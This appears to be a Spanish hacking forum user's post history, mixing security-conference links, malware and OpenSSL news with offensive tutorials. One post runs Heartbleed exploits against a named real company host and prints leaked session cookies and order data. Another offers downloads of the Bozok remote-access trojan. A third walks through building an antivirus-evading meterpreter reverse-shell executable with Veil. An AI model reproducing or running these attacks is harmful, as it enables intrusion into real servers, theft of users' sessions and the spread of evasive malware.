Wiki del proyecto

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#18
Hacking / Derbycon
Octubre 02, 2014, 10:06:31 PM

Derbycon es la nueva conferencia hacker que se realiza en Louisville, Kentucky durante la ultima semana de septiembre, la primera derbycon se realizo en el 2011 con más de 1,100 asistentes, este año se realizo la numero 4.

Pueden ver los videos de las conferencias en los siguientes enlaces, donde se pueden encontrar cosas muy interesantes como Bypassing Internet Explorer's XSS Filter,  Abusing Active Directory in Post-Exploitation, conferencias de la mano de Kevin Mitnick, HD moore... etc.

DerbyCon 1.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

DerbyCon 2.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

DerbyCon 3.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

DerbyCon 4.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#19
El Buró Federal de Investigación (FBI por sus siglas en inglés) de los Estados Unidos anunció que su herramienta de análisis de malware pronto estará disponible para organizaciones sin fines de lucro y empresas privadas a través de un portal web.


Jonathan Burns, agente del FBI, quien trabaja en operaciones contra el cibercimen, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta las capacidades de la herramienta No tienes permitido ver los links. Registrarse o Entrar a mi cuentar hace unos días en el marco de la conferencia No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

El portal, lanzado en agosto, ofrece el análisis automático de archivios enviados por los usuarios y provee los siguientes tipos de pruebas y resultados:
Hashes de archivos (MD5, SHA-1, SHA-256, SSDEEP)
Correlación
Comparación de malware (análisis por similaridad)
Fuzzy Hashing
Section Hashing
Cluster para el escaneo de virus
Sandbox (PE32 exe, PDF, documentos de MS Office)
Modificación del sistema de archivos
Procesos
Modificaciones en el registro
Intentos de conexiones de red
Otros (escritura del archivo, importación de funciones, comportamiento sobre el tiempo)
Cadenas

De acuerdo al sitio web, "Malware Investigator es una herramienta que ofrece a los usuarios la habilidad de enviar un archivo sospechoso de ser malware y, en menos de una hora, recibir información técnica detallada sobre lo que el malware hace y cuál podría ser su objetivo."

La información proporcionada permite a los investigadores y especialistas en seguridad reaccionar rápido ante ataques que involucren malware.

Actualmente, la herramienta sólo puede analizar archivos ejecutables para Windows, archivos PDF y otros tipos de archivos comunes. De acuerdo al sitio ThreatPost, el FBI tiene planeado expandir la lista de archivos que pueden analizarse con la herramienta para incluir archivos de Android y otros sistemas operativos.

Dentro de la estrategia del FBI para brindar acceso a diferentes entidades no gubernamentales, también se incluye la liberación de la API de la herramienta para que las compañías interesadas puedan integrar la aplicación con sus sistemas actuales.

Permitir el acceso a la herramienta Malware Investigator al sector privado, a investigadores de seguridad, al sector académico y a otras organizaciones sin fines de lucro, es un gran movimiento del FBI por varias razones, entre las que se incluyen la ayuda a la comunidad en general en la lucha contra el malware, además de la posibilidad de recolectar muestras de malware que de otra forma sería difícil o tardado conseguir para el FBI
#20
Off Topic / Feliz cumpleaños Snifer!
Septiembre 20, 2014, 11:06:16 PM

Perra!!!!!  ;D Te voy adelantar las felicitaciones ya que mañana andas de cumpleañera; en nombre de la Comunidad Troll te deseo un feliz cumple perra que te la pases de lo mejor y lo mas importarte que disfrutes el #FBFriendlyLogout Jajajajajaja PD: maldito no puedo ingresar

En fin disfruta tu cumple crack :-*

PD: Todo aquel que tenga ganas de trolear a la cumpleañera entrar a este enlace de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.... Saludos.

#21
Hacking / DefCon 22
Agosto 18, 2014, 05:39:31 PM

En las pasadas fechas 7 – 10 de agosto en el Hotel y Casino Rio se celebró el evento de seguridad informática más grande a nivel mundial la DefCon22 la más prestigiosa conferencia hacker anual a nivel mundial.  Entre sus asistentes podemos encontrar desde agentes federales (FBI, CIA) hasta los mejores hackers del mundo y los mas locos que se puedan ver.

El día miércoles 7 nos dispusimos a comprar las entradas con mi amigo wifi, encontrando con una cantidad maravillosa de personas.


Todos haciendo una gran cola para poder obtener este badge hermoso.


Una experiencia única poder estar en la defcon si tienen pensando asistir los animo, se pueden encontrar muchas cosas fascinantes a parte de las charlas, un ejemplo claro serian las villa de social ingenieer, wireless, crypto and privacy, tamper evident y no puede faltar la villas de lockpick, entre muchas otras.


Aparte de las villas no pueden faltar los CTF ( Capture The Flag ) y el CTP ( Capture The Packet ).


También se pueden encontrar cosas curiosas como estas 8) 8) 8) LOL xD


Puedes descargar todas las presentaciones de la defcon22.


Enlace Mega:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

PD: Snifer esta entrada va para ti perra, espero no me odies más.  :'(
#22
Hacking / Investigando Ataques con PowerShell
Agosto 17, 2014, 11:46:22 AM

En la pasada BlackHat y Defcon se presento un tema que me llamo mucho la atención que fue "Investigating PowerShell Attacks" donde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta &  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta muestran los ataques comunes como ejecución de código remoto, ataques persistentes. Ademas a lo largo de la charla incluyeron ejemplos de incidentes reales y recomendaciones sobre cómo limitar la exposición a estos ataques.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para los que no conocen PowerShell, es una shell de línea de comandos y un lenguaje de scripting basado en tareas especialmente diseñado para la administración del sistema. Basado en .NET Framework, Windows PowerShell™ ayuda a los profesionales de TI y a los usuarios avanzados a controlar y automatizar la administración del sistema operativo Windows y las aplicaciones que se ejecutan en Windows.

Un libro que les recomiendo seria:

PowerShell: La navaja suiza de los administradores de sistemas

Herramientas

La herramienta que les recomiendo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es un framework con una colección de scripts y payloads que te permitirá usar PowerShell para realizar diversos ataques y tareas post-exploitación durante un pentest.
#23

Después de la catástrofe de seguridad llamada Heartbleed, el compromiso económico de varias empresas para reforzar el desarrollo de OpenSSL, y varios ataques de alto perfil, aparecen nuevos bugs sobre la implementación. En esta oportunidad, uno de los errores llevaría dieciséis años flotando en el código, mientras que otro habría sido provocado por el mismo desarrollador asociado a Heartbleed.

Si obedecemos a las últimas noticias relacionadas con OpenSSL, quien no conozca los detalles de su desarrollo consideraría a su funcionamiento como un verdadero milagro. Y la realidad nos indica que funcionó bastante bien... hasta que Heartbleed explotó y arrojó metralla en todas direcciones. Las acusaciones (de ambos lados) no tardaron en llegar, y se supone que los jugadores más importantes del mercado están dispuestos a inyectar una cierta cantidad de dinero en OpenSSL con el objetivo de estabilizarlo. Los creadores de OpenBSD decidieron tomar la ruta del fork y dar forma a LibReSSL, una nueva implementación. Ahora, OpenSSL se encuentra en los microscopios de expertos alrededor del mundo, y como era de esperarse, algunas de sus fisuras son realmente graves.


La última de las vulnerabilidades, descubierta por el investigador Masashi Kikuchi, está enfocada sobre un manejo inapropiado del protocolo ChangeCipherSpec (o CCS, como prefieran) mientras se lleva a cabo un handshake. Al aceptar CCS en otros intervalos aparte de los correctos, se puede hablar de una inyección CCS destinada a modificar o descifrar datos en un canal establecido. La peor parte es que el bug, cuyo nombre oficial es CVE-2014-0224, lleva dieciséis años en el código. Dicho de otra manera, existe desde el primer build de OpenSSL. El "alivio" por así decirlo, lo aporta Adam Langley, ingeniero en Google, quien explica que para aprovechar correctamente a CVE-2014-0224 se necesita obtener una posición "man-in-the-middle", y nos recuerda que los clientes no-OpenSSL pueden ignorar esta advertencia.

El total de bugs descubiertos asciende a seis, pero hay otro que se destaca, CVE-2014-0195. Afecta a las versiones 0.9.8, 1.0.0 y 1.0.1, y permitiría nada menos que ejecución de código remoto, debido a fragmentos inválidos en DTMS (el cifrado TLS sobre UDP, en vez de TCP). Tal y como lo indican en el blog de seguridad de Hewlett-Packard, los logs vinculados a CVE-2014-0195 tienen un nombre, Robin Seggelmann, que es exactamente el mismo nombre flotando alrededor de Heartbleed. Separados, estos bugs tal vez sean más complicados de explotar, pero podrían demandar más esfuerzo en su corrección que el propio Heartbleed. Esto es apenas la punta del iceberg, y quien tenga los recursos para actualizar OpenSSL en sus sistemas, debería hacerlo de inmediato.

Fuente: neoteo
#24
Análisis y desarrollo de malwares / Bozok Rat
Junio 10, 2014, 10:46:18 AM

Algunas de sus características:

-Shell Remota
-Buscador de archivos
-Descargar carpeta
-Terminar/Borrar Procesos
-Multi-lenguaje
-Descargar/Ejecutar Archivos
-Administrador De Archivos
-Administrador De Procesos
-Administrador De Registros
-Entre otras.

Descargar Bozok Rat.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Nota: Unicamente cambie el mirror los archivos estan sin modificar.
#25
Hacking / [Video Tutoriales] Exploiter.co
Mayo 22, 2014, 12:05:15 AM

Exploiter.co es una empresa que se dedica a enseñarte técnicas de hacking ofensivas y defensivas, programación y mucho mas!. Disfruta la experiencia del hacking con sus video tutoriales:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En el primer #ExploiterCoLive hablamos de qué es realmente un hacker y como llegar a convertirse en uno, certificaciones como CEH, CISSP, programación en Python, Ruby y mucho más!




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Aprende como hacer un penetration testin vde forma profesional con las mejores metodologías y herramientas




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Con este taller te llevaremos de cero a un nivel avanzado en hacking de la mano de python.




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En la segunda parte del  taller te enseñamos a darle lógica a tus programas, ahorrar código con funciones y empaquetar tus módulos.




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Aprende a manejar ficheros y a usar el poder de Python haciendo Hacking en un entorno profesional.




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Aprende con una detallada explicación el funcionamiento de la programación orientada a objetos (POO) y como Sqlmap hace uso de ella.




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En esta ocasión aprenderemos a hacer fuerza bruta a un servior FTP, detectar banners y acceso anonimo con Python.
#26

Buenas noches; Para todos aquellos amantes de Backbox les dejo este excelente Libro sobre Pentesting utilizando Backbox.

Para los que no conocen Backbox: Es una distribución Linux basada en Ubuntu Lucid 11.04, adaptada para ser usada en pruebas de seguridad. Se ha diseñado y desarrollado con el objetivo de ser rápida y sencilla de utilizar. Mantiene su propio repositiorio que pretende estar siempre actualizado con la última versión estable de las herramientas más conocidas y utilizadas en las pruebas de hacking.


  • Network Napping – Zenmap, Hping3, Xprobe ...
  • Privilege Escalation
  • Vulnerability Assessment
  • Web Application Analysis
  • Entre otras.

Screms:


Table of Contents

    Chapter 1: Starting Out with BackBox Linux
    Chapter 2: Information Gathering
    Chapter 3: Vulnerability Assessment and Management
    Chapter 4: Exploitations
    Chapter 5: Eavesdropping and Privilege Escalation
    Chapter 6: Maintaining Access
    Chapter 7: Penetration Testing Methodologies with BackBox
    Chapter 8: Documentation and Reporting

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#27

Buenas underc0de, tanto tiempo de no publicar algo por aqui.

En este pequeño tutorial veremos como explotar la famosa vulverabilidad heartbleed.

"Es el bug mas grande en OpenSSL, capaz de capturar y desencriptar desde los nombres de usuario hasta las contraseñas, entre otra información sensible contenida en la memoria de los servidores."

Pueden saber mas en este No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que ANTRAX publicó.

Formas de explotarlo.

1. Exploit:

Unas de las formas de explotarlo es con el exploit: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta e interpretarlo con python.

Uso del exploit:

Código: php
python openssl.py sales.bbuconnect.com --port 443 > output_ssl.txt
cat output_ssl.txt


Resultado:

Código: php
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 86
... received message: type = 22, ver = 0302, length = 1394
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:




Como podemos ver la página es vulnerable. Arrojandonos muchos datos sensibles.

2. Metasploit:

Como siempre metasploit facilitandonos la vida, para explotarlo usaremos el módulo: openssl_heartbleed.rb --> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Uso:

Código: php
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS sales.bbuconnect.com
set RPORT 443
set VERBOSE true
run


Resultado:

Código: php
 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                        http://metasploit.pro |
|______________________________________________________________________________|


       =[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1154 exploits - 673 auxiliary - 182 post
+ -- --=[ 310 payloads - 30 encoders - 8 nops

msf auxiliary(openssl_heartbleed) > set RHOSTS sales.bbuconnect.com
RHOSTS => sales.bbuconnect.com
msf auxiliary(openssl_heartbleed) > set RPORT 443
RPORT => 443
msf auxiliary(openssl_heartbleed) > set VERBOSE true
VERBOSE => true
msf auxiliary(openssl_heartbleed) > run

[*] 4.31.139.165:443 - Sending Client Hello...
[*] 4.31.139.165:443 - Sending Heartbeat...
[*] 4.31.139.165:443 - Heartbeat response, checking if there is data leaked...
[+] 4.31.139.165:443 - Heartbeat response with leak
[*] 4.31.139.165:443 - Printable info leaked: @,ED!! ECECFFDCDADFDFDBDIDHEMFECACACAAA FFFDFEEMEEEHECECFHDADADDCACACAAASMB%V\MAILSLOT\BROWSEBBU2055187LTn_@@"|,!t-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://orders.bbuconnect.com/prompt/,DanaInfo=.abcwsvtsw1y1zpM-u-9sSw98,Port=10001+QtyModifierCookie: DSSignInURL=/; DSFirstAccess=1398132759; DSLastAccess=1398132936; DSLaunchURL=2F64616E612F686F6D652F73706163652E676966; DSID=b28e87546e98e6d08303408643f3f270Connection: keep-alivePfuMFau4A|9@6 ding: gzip, deflateHost: sales.bbuconnect.comDNT: 1Connection: Keep-AliveCookie: DSSignInURL=/; DSID=9e6dfea3018fb3ed2cddbe4fb6fcc008; DSFirstAccess=1398132571; DSLastAccess=1398132936h;+IM@M#$mRJH"p]N3uVht7e76fd5e3aa9dfebaca6107ed699f5; DSLastAccess=1398132936?>FA*ate_lvl=0&sticker_id=000&individual_pid=7203001339+000&pso_indicator=N&sun=-&mon=0&tue=0&wed=-&thu=0&fri=0&sat=0&row_total=0&prodId=7203001339+000&prodName=LTLEBTS+BLUEMUFF&grand_total=0&fore_cast=3&suggested_order=6&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203001340+000&pso_indicator=N&sun=-&mon=0&tue=0&wed=-&thu=0&fri=0&sat=0&row_total=0&prodId=7203001340+000&prodName=LB+CRUMB+CAKE+5P&grand_total=0&fore_cast=1&suggested_order=0&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203001342+000&pso_indicator=N&sun=-&mon=0&tue=18&wed=-&thu=0&fri=0&sat=0&row_total=18&prodId=7203001342+000&prodName=LTLEBTS+BROWNIES&grand_total=18&fore_cast=5&suggested_order=18&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203001353+000&pso_indicator=N&sun=-&mon=0&tue=18&wed=-&thu=0&fri=0&sat=0&row_total=18&prodId=7203001353+000&prodName=LTLEBTS+CHOCCPMF&grand_total=18&fore_cast=3&suggested_order=18&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203002058+052&pso_indicator=N&sun=-&mon=0&tue=0&wed=-&thu=12&fri=0&sat=0&row_total=12&prodId=7203002058+052&prodName=LB+SNDOODLE+MUFF&grand_total=12&fore_cast=4&suggested_order=12&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7203002200+052&pso_indicator=N&sun=-&mon=-&tue=0&wed=-&thu=0&fri=0&sat=0&row_total=0&prodId=7203002200+052&prodName=LB+STWBYOG+MFN5P&grand_total=0&fore_cast=1&suggested_order=0&modified=-1&sun_pct=1&mon_pct=1&tue_pct=1&wed_pct=1&thu_pct=1&fri_pct=1&sat_pct=1&total_pct=1&sun_dif=0&mon_dif=0&tue_dif=0&wed_dif=0&thu_dif=0&fri_dif=0&sat_dif=0&change_total_from_zero=false&close_dt=NO&prom_id=null&prom_cat_id=0&wk_type_id=0&prom_id2=null&prom_cat_id2=0&wk_type_id2=0&has_prom_vol=0&update_dt=04-21-2014&depot_closed=0&update_lvl=0&sticker_id=000&individual_pid=7087000908+
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(openssl_heartbleed) >


3: Nmap NSE script

Para detectar si es vulnerable: --> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Uso:

Código: php
nmap -p 443 --script ssl-heartbleed <tarjet>


Resultado:

Código: php
stuxnet@stuxnet:/media/Stuxnet/Pentesting/$ nmap -p 443 --script ssl-heartbleed 4.31.139.165

Starting Nmap 6.46 ( http://nmap.org ) at 2014-04-21 21:19 CST
Nmap scan report for sales.bbuconnect.com (4.31.139.165)
Host is up (0.13s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt
|_      http://cvedetails.com/cve/2014-0160/
#28
Android / Sqlmapchik
Diciembre 17, 2013, 09:58:24 PM

Sqlmapchik es una herramienta multiplataforma que desliga de la herramienta conosida 'Sqlmap' aun esta en su version beta pero se espera una aplicacion multifuncional, estas son las caracteristicas hasta ahora:

    sqlmap API
    profiling
    log colorizing
    beeping :)
    user-defined function injection
    updating
    metasploit integration


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#29
Hacking / Veil – Evasión de Antivirus
Diciembre 12, 2013, 09:43:23 AM

Veil es una herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus. Utiliza métodos distintos para generar payloads diferentes y permite al usuario usar Pyinstaller o Py2Exe para convertir los payloads de Python a ejecutables.

Descarga Veil:

Código: php
git clone https://github.com/ChrisTruncer/Veil
cd Veil
python Veil.py


Veil Modo de Uso

Código: php
root@stuxnet:/media/Stuxnet/Pentesting/veil# python Veil.py

=========================================================================
Veil First Run Detected... Initializing Script Setup...
=========================================================================

[*] Executing ./config/update.py...
[>] Please enter the path of your metasploit installation: /media/Stuxnet/Pentesting/msf
[*] OPERATING_SYSTEM = Linux
[*] TERMINAL_CLEAR = clear
[*] VEIL_PATH = /media/Stuxnet/Pentesting/veil/
[*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/
[*] Path '/root/veil-output/source/' Created
[*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/
[*] Path '/ro
ot/veil-output/compiled/' Created
[*] TEMP_DIR = /tmp/
[*] METASPLOIT_PATH = /media/Stuxnet/Pentesting/msf
[*] PYINSTALLER_PATH = /opt/pyinstaller-2.0/
[*] MSFVENOM_OPTIONS =
[*] Configuration File Written To /media/Stuxnet/Pentesting/veil/config/settings.py

=========================================================================
Veil | [Version]: 2.1.0
=========================================================================
[Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

[!] WARNING: Official support for Kali Linux (x86) only at this time!
[!] WARNING: Continue at your own risk!

Main Menu

    18 payloads loaded

Available commands:

    use             use a specific payload
    update          update Veil to the latest version
    list            list available languages/payloads
    info            information on a specific payload
    exit            exit Veil

[>] Please enter a command: list


=========================================================================
Veil | [Version]: 2.1.0
=========================================================================
[Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

[!] WARNING: Official support for Kali Linux (x86) only at this time!
[!] WARNING: Continue at your own risk!

Available payloads:

    1)  c/VirtualAlloc                  Poor
    2)  c/VoidPointer                   Poor

    3)  c#/VirtualAlloc                 Poor
    4)  c#/b64SubVirtualAlloc           Normal

    5)  native/BackdoorFactory          Normal
    6)  native/hyperion                 Normal
    7)  native/pescrambler              Normal

    8)  powershell/DownloadVirtualAlloc     Excellent
    9)  powershell/PsexecVirtualAlloc       Excellent
    10) powershell/VirtualAlloc         Excellent

    11) python/AESEncrypted             Excellent
    12) python/ARCEncrypted             Excellent
    13) python/Base64Encode             Excellent
    14) python/DESEncrypted             Excellent
    15) python/FlatInjection            Normal
    16) python/LetterSubstitution       Excellent
    17) python/MeterHTTPContained       Excellent
    18) python/MeterHTTPSContained      Excellent

[>] Please enter a command: 11

=========================================================================
Veil | [Version]: 2.1.0
=========================================================================
[Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

Payload: python/AESEncrypted loaded

Required Options:

Name           Current Value   Description
----           -------------   -----------
compile_to_exe     Y           Compile to an executable
inject_method      virtual     [virtual]alloc or [void]pointer
use_pyherion       N           Use the pyherion encrypter

Available commands:

    set             set a specific option value
    info            show information about the payload
    help [crypters] show help menu for payload or crypters
    generate        generate payload
    exit            exit Veil
    back            go to the main menu

[>] Please enter a command: generate

=========================================================================
Veil | [Version]: 2.1.0
=========================================================================
[Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

[?] Use msfvenom or supply custom shellcode?

        1 - msfvenom (default)
        2 - Custom

[>] Please enter the number of your choice: 1

[*] Press [enter] for windows/meterpreter/reverse_tcp
[*] Press [tab] to list available payloads
[>] Please enter metasploit payload:
[>] Enter value for 'LHOST', [tab] for local IP: xxx.xxx.xxx.xxx
[>] Enter value for 'LPORT': 4444
[>] Enter extra msfvenom options in OPTION=value syntax:

[*] Generating shellcode...

=========================================================================
Veil | [Version]: 2.1.0
=========================================================================
[Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

[*] Press [enter] for 'payload'
[>] Please enter the base name for output files:

[?] How would you like to create your payload executable?

        1 - Pyinstaller (default)
        2 - Py2Exe

[>] Please enter the number of your choice: 1


Seleccionamos la opción 1 y finalizamos. En este momento empieza a salir varios mensajes por consola mientras genera el ejecutable y finalmente, muestra un resumen de todo. En este se puede ver la ruta en la que ha dejado el resultado.

Ahora abrimos Metasploit:
   
Código: php
msf> use exploit/multi/handler
msf exploit(handler) > exploit
#30
Hacking / Curso de Ethical Hackers
Noviembre 07, 2013, 01:17:29 AM

Otro excelente curso de incube2

Módulos:

Este adiestramiento cuenta con 20 módulos de sobre Ethical Hacking.


Módulo 1: Bienvenida al Curso de Ethical Hackers
Módulo 2: Cómo crear un laboratorio de seguridad
Módulo 3: Cómo crear una máquina virtual
Módulo 4: Ciclo del Hacking 1 – Reconocimiento
Módulo 5: Ciclo del Hacking 2 – Escaneo
Módulo 6: Ejercicio de Escaneo
Módulo 7: Escaneo SNMP
Módulo 8: Introducción al Wireless Hacking
Módulo 9: El mundo del Ingeniería Social
Módulo 10: Email Falso – Phishing
Módulo 11: Seguridad en los Passwords
Módulo 12: Troyanos y Backdoors
Módulo 13: Herramientas para su laboratorio de seguridad
Módulo 14: Leyes Federales
Módulo 15: Vulnerabilidades
Módulo 16: Principios de un Botnet
Módulo 17: Google Hacking Database
Módulo 18: Background Check
Módulo 19: Certificaciones
Módulo 20: Despedida

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#31

se puede definir que el código generado para las aplicaciones Android no es exactamente "Java Bytecode", por eso los ejecutables para Android no contienen ficheros .class si no .dex que significa Dalvik Executable. De igual forma estos ficheros .dex se pueden "decompilar" y lo que veremos posteriormente será un lenguaje de bajo nivel (Dalvik Bytecode).

Aunque como tal con algunas aplicaciones específicas podemos ver en un lenguaje de alto nivel estos códigos (aplicaciones como Dex2Jar posteriormente decompilando con JD-GUI). Algunos enlaces interesantes sobre Dalvik y los OPCodes:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Herramientas a utilizar y preparación del entorno

Para la preparación del entorno tendremos en cuenta todo lo necesario para empezar casi "desde cero", los requisitos como siempre son saber la lógica de un lenguaje de programación (mejor si es Java) y bueno, lo demás se explicará poco a poco.

Como trabajaremos con Android necesitaremos usar la plataforma Java, ojo, no basta con el entorno de ejecución (JRE) necesitaremos todas las herramientas para desarrolladores (JDK – Java Development Kit) y un IDE cualquiera, puede ser Eclipse. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
   
También necesitaremos las herramientas de desarrollo de Android o SDK, en el portal oficial hay una guía de instalación No tienes permitido ver los links. Registrarse o Entrar a mi cuenta también debemos configurar un emulador o el AVD, que nos permitirá ejecutar una "máquina virtual" de Android en nuestros ordenadores (ver aquí No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Smali/Baksmali: se trata de un ensamblador/desemsamblador de ficheros apk que nos servirá para generar los fuentes en lenguaje de bajo nivel (aunque como tal no lo usaremos en esta guía). Se puede descargar de aquí: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

APKTool: Esta herramienta sustituirá el Smali/Baksmali ya que los integra dentro de su paquete. Como su nombre lo indica es un kit de herramientas para trabajar con ficheros APK. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta con el generaremos el código de bajo nivel y luego recompilaremos.

Testsign.jar: Es una herramienta de terceros desarrollada para "firmar" o generar certificados aleatorios para indicarle al sistema que el fichero que hemos modificado se trata de una aplicación Android. Se descarga de aquí No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (buscar el fichero testsign.jar).

zipalign: se trata de una herramienta que viene incluida en el SDK (PATH\android-sdk-windows\tools\zipalign.exe), que está hecha para preparar nuestro apk para el sistema Android, es decir, para que su rendimiento sea tal cual para dicho sistema ya que si no está "comprimida" con esta herramienta podría afectar el rendimiento de la misma en el dispositivo.

Instalar aplicaciones APK en el emulador de Android

El AVD Manager Tool es la herramienta que nos permite gestionar distintas "máquinas virtuales" de un sistema Android configuradas para un api específica (es decir, para distintas versiones del sistema operativo Android). Supondré que ya tienen instalado el Android SDK que viene con el SDK Manager pero aún falta configurar dicho "emulador" o máquina virtual. Por lo que aquí explicaré como crear una. Lo que necesitaremos es ir al directorio en donde hemos instalado el Android SDK, allí veremos el ícono del logo o mascota de Android llamado SDK Manager, desde allí podremos instalar diversas apis y claro, configurar nuestra nueva máquina virtual.

Allí hacemos clic en la opción "Virtual Devices" y si es la primera vez que lo usamos de seguro no habrá ninguna máquina virtual configurada, por lo que hacemos clic en el botón de la derecha que dice "New...".


Luego tendremos que configurarla. Los parámetros son:

Name: El nombre de la máquina virtual. Esta no puede contener espacios.

